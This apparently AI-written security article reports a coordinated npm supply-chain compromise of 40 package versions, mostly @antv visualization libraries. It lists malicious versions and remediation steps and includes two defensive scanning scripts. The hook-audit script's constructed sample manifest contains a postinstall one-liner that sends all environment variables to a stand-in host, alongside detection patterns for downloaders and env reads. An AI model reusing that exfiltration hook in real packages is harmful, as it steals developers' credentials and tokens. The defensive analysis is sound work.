VYPR
Vypr Intelligence | AI-generated | May 31, 2026

npm: 40 @antv/* Packages Compromised in Coordinated Supply-Chain Attack

On May 19, 2026, 40 malicious package versions were disclosed on npm, targeting the @antv visualization ecosystem with backdoored releases that exfiltrate environment secrets to a remote host.

Key findings

  • 35 of the 40 malicious package versions belong to the @antv/ npm scope, a popular visualization toolkit
  • All 40 advisories were published on 2026-05-19, indicating a coordinated disclosure and takedown
  • The malware exfiltrates environment variables, including npm tokens, to a remote host; the advisories associate it with canvas-nest.js, which is also one of the compromised package names (there is no .js top-level domain, so treat the exact hostname as unconfirmed)
  • Several compromised packages have hundreds of thousands of weekly downloads, including @antv/event-emitter (346k/week)
  • The packages were first published years ago; these are backdoored releases of legitimate packages, most likely pushed with stolen maintainer credentials, not typosquats
  • Stolen npm publish tokens would let the attacker pivot further by publishing more malicious versions

On May 19, 2026, a coordinated supply-chain attack on the npm registry came to light: 40 malicious package versions, the vast majority in the @antv/* visualization library family. The advisories for all 40 were published at once, a single orchestrated takedown push by security teams after what appears to be a maintainer account breach.

The attack's signature is unmistakable: 35 of the 40 versions share the @antv/ npm scope, the namespace of Ant Group's open-source visualization toolkit (AntV). The remaining five, canvas-nest.js, babel-plugin-version, jest-expect, jest-random-mock, and fixed-round, are unrelated packages that were most likely pushed with the same stolen credentials; a dependency-confusion attack would not explain backdoored versions of packages that already exist on the registry. Representative compromised packages include @antv/event-emitter (346k weekly downloads), @antv/algorithm (182k/week), @antv/vendor (190k/week), @antv/g2plot (97k/week), and @antv/g-webgpu-engine (82k/week). These are not obscure typosquats; they are legitimate, long-established packages with years of history and hundreds of thousands of weekly installs.

OpenSSF Package Analysis behavioral findings show that the malicious versions execute a post-install script that contacts a remote host the advisories associate with the name canvas-nest.js (also one of the compromised package names; since .js is not a top-level domain, the exact hostname should be treated as unconfirmed). The script harvests environment variables, including npm_token, npm_config_registry, and other credentials, then exfiltrates them to that host. This pattern, stealing tokens from the CI/CD environment, is the classic supply-chain pivot: with a valid npm token the attacker can publish further malicious versions of any package that token is allowed to write to.
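One way to triage an installed tree for the behaviour just described, as an added example that is not code from the advisories, AntV or npm: it lists the install-time lifecycle hooks declared in each package.json and flags commands that read process.env or reach the network. The heuristics, the package names and the two sample manifests are constructed for this example; the second manifest illustrates the pattern and is not the real @antv payload.

```javascript
// Added example, not code from the advisories, AntV or npm: list install-time
// lifecycle hooks in an installed tree and flag commands that read process.env or
// reach the network, the pattern the advisories describe. The two manifests at the
// bottom are constructed for the demo; the second is not the real payload.

const HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics chosen for this example (an assumption, not a published IOC list).
const SUSPICIOUS = [
  ['reads process.env', /process\.env\b/],
  ['shell downloader', /\b(curl|wget)\b/],
  ['URL literal', /https?:\/\//],
  ['node http(s) client', /require\(['"](node:)?https?['"]\)|\bfetch\(/],
  ['spawns a subprocess', /child_process/],
];

// Returns one finding per lifecycle hook declared in a package.json object.
function auditManifest(pkgName, manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const suspicious = SUSPICIOUS.filter(([, re]) => re.test(command)).map(([label]) => label);
    findings.push({ package: pkgName, hook, command, suspicious });
  }
  return findings;
}

// Walks a node_modules directory on disk and audits every package.json in it.
// Hooks that only run a file (e.g. "node install.js") still need that file read by hand.
function auditTree(root) {
  const fs = require('fs');
  const path = require('path');
  const findings = [];
  const stack = [root];
  while (stack.length) {
    const dir = stack.pop();
    let entries = [];
    try { entries = fs.readdirSync(dir, { withFileTypes: true }); } catch { /* unreadable; skip */ }
    for (const entry of entries) {
      const p = path.join(dir, entry.name);
      if (entry.isDirectory()) stack.push(p);
      else if (entry.name === 'package.json') {
        try { const m = JSON.parse(fs.readFileSync(p, 'utf8')); findings.push(...auditManifest(m.name || p, m)); }
        catch { /* not a manifest; skip */ }
      }
    }
  }
  return findings;
}

// Constructed manifests for the demo.
const SAMPLE_CLEAN = { name: 'harmless-lib', scripts: { build: 'tsc', test: 'jest' } };
const SAMPLE_HOOKED = {
  name: 'constructed-hooked-pkg', // not a real package
  scripts: {
    postinstall: "node -e \"require('https').request({host:'exfil.invalid',method:'POST'}).end(JSON.stringify(process.env))\"",
  },
};

function demo() {
  return [...auditManifest(SAMPLE_CLEAN.name, SAMPLE_CLEAN), ...auditManifest(SAMPLE_HOOKED.name, SAMPLE_HOOKED)];
}

// Usage: node audit-hooks.js ./node_modules   (prints only hooks with suspicious matches)
if (process.argv[2]) {
  for (const f of auditTree(process.argv[2])) if (f.suspicious.length) console.log(f);
} else {
  console.log(demo());
}
```

Installing with npm ci --ignore-scripts (or ignore-scripts=true in .npmrc) stops lifecycle scripts from executing at install time at all, which is the cheapest defence against this class of payload; packages that build native addons from a postinstall hook then need their builds invoked explicitly.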

Any computer that installed one of these malicious versions, whether a developer workstation, a CI/CD runner, or a production build server, should be treated as fully compromised. The GHSA advisories uniformly warn that every secret and key stored on that machine must be rotated immediately from a separate, trusted system. Because the malware targets npm tokens specifically, the attacker may already have used stolen tokens to publish additional malicious packages beyond this burst.

Developers and security teams should immediately audit their package-lock.json (or npm-shrinkwrap.json), yarn.lock, or pnpm-lock.yaml for the following packages at the listed malicious versions (a representative subset of the 40; consult the advisories for the full list):

  • @antv/event-emitter at 0.3.3
  • @antv/algorithm at 0.3.26
  • @antv/vendor at 1.2.11
  • @antv/g2plot at 2.6.35
  • @antv/g-plugin-svg-renderer at 2.6.1
  • canvas-nest.js at 2.2.4
  • jest-expect at 0.2.1
  • babel-plugin-version at 0.4.3

If any match is found, rotate all credentials, npm tokens, and CI/CD secrets from a clean machine. Maintainers should list the tokens on their npm account (npm token list), revoke any they do not recognize, and check the version history of every package they publish for releases they did not make. Report any suspicious activity linked to the @antv scope to the npm security team.
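The lockfile audit described above, as an added example that is not tooling from Vypr, npm or AntV: it reads package-lock.json (or npm-shrinkwrap.json), yarn.lock or pnpm-lock.yaml, extracts every resolved name and version, and reports matches against the eight versions listed in this article. The sample lockfiles are constructed for the demo and the file-name detection is an assumption of this script.

```javascript
// Added example, not tooling from the advisories, npm or AntV: scan a lockfile for
// the malicious versions listed in this article. Samples near the bottom are constructed.

// Package -> malicious versions, as listed in the advisories quoted above.
const IOCS = {
  '@antv/event-emitter': ['0.3.3'], '@antv/algorithm': ['0.3.26'], '@antv/vendor': ['1.2.11'],
  '@antv/g2plot': ['2.6.35'], '@antv/g-plugin-svg-renderer': ['2.6.1'], 'canvas-nest.js': ['2.2.4'],
  'jest-expect': ['0.2.1'], 'babel-plugin-version': ['0.4.3'],
};

// package-lock.json / npm-shrinkwrap.json: lockfileVersion 2 and 3 keep a flat
// "packages" map keyed by install path; lockfileVersion 1 nests "dependencies" by name.
function parsePackageLock(text) {
  const lock = JSON.parse(text);
  const found = [];
  for (const [p, e] of Object.entries(lock.packages || {})) {
    const i = p.lastIndexOf('node_modules/'); // the "" key is the root project
    if (i >= 0 && e.version) found.push({ name: p.slice(i + 'node_modules/'.length), version: e.version });
  }
  const walk = (deps) => Object.entries(deps || {}).forEach(([name, d]) => {
    if (d.version) found.push({ name, version: d.version });
    walk(d.dependencies);
  });
  if (!lock.packages) walk(lock.dependencies);
  return found;
}

// yarn.lock (classic and berry): an unindented line of comma-separated descriptors
// ending in ":" is followed by an indented "version" line that applies to all of them.
function parseYarnLock(text) {
  const found = [];
  let names = [];
  for (const line of text.split(/\r?\n/)) {
    if (/^[^\s#].*:$/.test(line)) {
      names = line.slice(0, -1).split(',').map((d) => {
        const desc = d.trim().replace(/^"|"$/g, '');
        const at = desc.lastIndexOf('@'); // scoped names start with "@", so split at the last one
        return at > 0 ? desc.slice(0, at) : null;
      }).filter(Boolean);
    } else {
      const m = line.match(/^\s+version:?\s+"?([^"\s]+)"?/);
      if (m) names.forEach((name) => found.push({ name, version: m[1] }));
    }
  }
  return found;
}

// pnpm-lock.yaml: keys under "packages:" look like "/name@version:" (v6),
// "'name@version':" (v9) or "/name/version:" (v5), optionally with a "(peer)" suffix.
function parsePnpmLock(text) {
  const found = [];
  let inPackages = false;
  for (const line of text.split(/\r?\n/)) {
    if (/^\S/.test(line)) { inPackages = line.startsWith('packages:'); continue; }
    const m = inPackages && line.match(/^  ['"]?\/?([^'"(:\s]+)/);
    if (!m) continue;
    const at = m[1].lastIndexOf('@');
    const cut = at > 0 ? at : m[1].lastIndexOf('/');
    if (cut > 0) found.push({ name: m[1].slice(0, cut), version: m[1].slice(cut + 1) });
  }
  return found;
}

// Keep each name@version once and return only the entries on the IOC list.
function findMatches(inventory, iocs = IOCS) {
  const seen = new Set();
  return inventory.filter(({ name, version }) => {
    const key = `${name}@${version}`;
    if (seen.has(key) || !(iocs[name] || []).includes(version)) return false;
    seen.add(key);
    return true;
  });
}

function scanLockfileText(filename, text) {
  const parse = /(package-lock|npm-shrinkwrap)\.json$/.test(filename) ? parsePackageLock
    : filename.endsWith('yarn.lock') ? parseYarnLock
    : filename.endsWith('pnpm-lock.yaml') ? parsePnpmLock : null;
  if (!parse) throw new Error(`unsupported lockfile: ${filename}`);
  return findMatches(parse(text));
}

// Constructed samples: each carries one listed version and one benign neighbour.
const SAMPLE_PACKAGE_LOCK = JSON.stringify({ lockfileVersion: 3, packages: {
  '': { name: 'demo-app' },
  'node_modules/@antv/event-emitter': { version: '0.3.3' },
  'node_modules/@antv/util': { version: '2.0.17' },
} });
const SAMPLE_YARN_LOCK = ['# yarn lockfile v1', '',
  '"@antv/algorithm@^0.3.0", "@antv/algorithm@~0.3.20":', '  version "0.3.26"', '',
  'jest-expect@^0.2.0:', '  version "0.2.0"'].join('\n');
const SAMPLE_PNPM_LOCK = ["lockfileVersion: '6.0'", 'packages:',
  '  /canvas-nest.js@2.2.4:', '    resolution: {integrity: sha512-constructed}',
  '  /babel-plugin-version@0.4.2:', '    resolution: {integrity: sha512-constructed}'].join('\n');

// Usage: node scan-lockfile.js path/to/pnpm-lock.yaml
if (process.argv[2]) {
  const hits = scanLockfileText(process.argv[2], require('fs').readFileSync(process.argv[2], 'utf8'));
  console.log(hits.length ? hits : 'no listed malicious versions found');
}
```

A lockfile only shows what was resolved for the next install; a tree that was already installed from a different lockfile, or without one, needs the installed node_modules checked as well (npm ls @antv/event-emitter, for instance), and a hit in any lockfile means the machine that installed from it falls under the rotation advice above.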

This incident continues a troubling trend of coordinated, high-volume supply-chain attacks on mature, widely adopted open-source ecosystems. Unlike typosquatting campaigns, which rely on user error, this attack backdoored legitimate, trusted packages with hundreds of thousands of weekly downloads each, a far more dangerous vector. Forty malicious versions landing in a single burst points to either a compromised maintainer account with publish access to the @antv scope or a leaked npm token with broad publish rights. Either way, the attack underscores the importance of npm token rotation, multi-factor authentication, and least-privilege publishing tokens for open-source maintainers.

AI-written article, grounded in 0 CVE records.